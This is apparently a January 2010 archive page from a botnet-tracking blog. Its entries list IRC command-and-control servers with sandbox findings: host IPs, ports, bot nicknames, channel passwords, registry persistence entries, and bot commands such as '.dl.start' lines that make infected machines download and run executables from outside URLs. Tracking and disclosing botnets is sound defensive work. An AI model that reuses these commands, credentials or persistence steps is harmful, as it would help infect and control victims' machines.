Month: January 2010

port.sistr.net

Uncategorized

port.sistr.net 72.8.130.112 i3ED6D120.versanet.de 62.214.209.32 Opened listening TCP connection on port: 113 * C&C Server: 72.8.130.112:7575 * Server Password: * Username: 32761086 * Nickname: [Ko]XP[Syn]79782 * Channel: #raw (Password: ) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareWinRAR SFX “C%%windows%systen32” = C:windowssysten32 HKEY_CURRENT_USERSoftwaremIRC “DateUsed” = 1263408663 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “DisplayName” = mIRC HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “UninstallString”Read more...

190.3.183.13

Uncategorized

Remote Host Port Number 190.3.183.13 43000 208.78.70.70 80 72.233.89.197 80 NICK {00-USA-XP-COMP-7111} NICK {iNF-00-USA-XP-COMP-9111} USER Wendy * 0 :COMP JOIN #SVR# ERROR PASS scary * The following ports were open in the system: Port Protocol Process 1052 TCP lcacc.exe (%System%lcacc.exe) 1053 TCP lcacc.exe (%System%lcacc.exe) 1054 TCP lcacc.exe (%System%lcacc.exe) 26717 TCP lcacc.exe (%System%lcacc.exe) Registry Modifications *Read more...

asp.ukbues.su (very large botnet)

Uncategorized

DNS Lookup Host Name IP Address 0 127.0.0.1 193.104.27.98 193.104.27.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1042 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://193.104.27.98/2krn.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.10.2 10.1.10.1 10.1.10.1Read more...

88.255.120.174

Uncategorized

88.255.120.174:7575 chann #im .start heur .dl.start http://www.ccpraa.com/zur.exe C:zur.exe 1 .dl.start http://www.ccpraa.com/ecran.exe C:ecran.exe 1 .dl.start http://www.ccpraa.com/erh.exe C:erh.exe 1 .dl.start http://www.ccpraa.com/32f.exe C:32f.exe 1

botdmostg.zapto.org

Uncategorized

botdmostg.zapto.org 204.188.244.70 * C&C Server: 204.188.244.70:6667 * Server Password: * Username: XP-6602 * Nickname: [DEU|00|P|06089] * Channel: #botd (Password: botdxD) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “test20” = servicsewn.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “test20” = servicsewn.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:d4n.exe” = c:d4n.exe:*:Enabled:test20 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout] HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”Read more...

irc.sicakalem.com

Uncategorized

irc.sicakalem.com 212.174.140.71 * C&C Server: 212.174.140.71:6667 * Server Password: * Username: XP-1648 * Nickname: [00|DEU|239956] * Channel: (Password: ) * Channeltopic: * C&C Server: 212.174.140.71:6667 * Server Password: * Username: XP-8131 * Nickname: [00|DEU|184371] * Channel: (Password: ) * Channeltopic: * C&C Server: 212.174.140.71:6667 * Server Password: * Username: XP-6634 * Nickname: [00|DEU|338589] * Channel:Read more...

irc.malvager.com

Uncategorized

* The following Host Name was requested from a host database: o irc.malvager.com * The data identified by the following URLs was then requested from the remote web server: o http://slayeraeb.angelfire.com/Server.ini o http://slayeraeb.angelfire.com/AJ.sla * There was application-defined hook procedure installed into the hook chain (e.g. to monitor keystrokes). The installed hook is handled by theRead more...

facebook-pic.co.cc(17k bots)

Uncategorized

facebook-pic.co.cc 88.255.120.174 * C&C Server: 88.255.120.174:7575 * Server Password: * Username: ccviglx * Nickname: [DEU|XP|578551] * Channel: #im (Password: heur) * Channeltopic: :.p2p |.msn.link comedy porn video :)) http://www.sevdamiz.net |.msn.email comedy porn video :)) http://www.sevdamiz.net |.aim.start comedy porn video :)) http://www.sevdamiz.net Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Services” = antiver.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminalRead more...

winudpmgr.mydyn.net

Uncategorized

Remote Host Port Numberwinudpmgr.mydyn.net 8080 NICK [XP]|239064039USER bvuucwlfl 0 0 :[XP]|239064039USERHOST [XP]|239064039MODE [XP]|239064039 -xi+BJOIN #ddosbotNICK [XP]|756551194USER jvecgoeyl 0 0 :[XP]|756551194USERHOST [XP]|756551194MODE [XP]|756551194 -xi+BNICK [XP]|617625980USER hojfuelqopx 0 0 :[XP]|617625980USERHOST [XP]|617625980MODE [XP]|617625980 -xi+B Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices o HKEY_CURRENT_USERSoftwareMicrosoftOLE * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + MicrosoftRead more...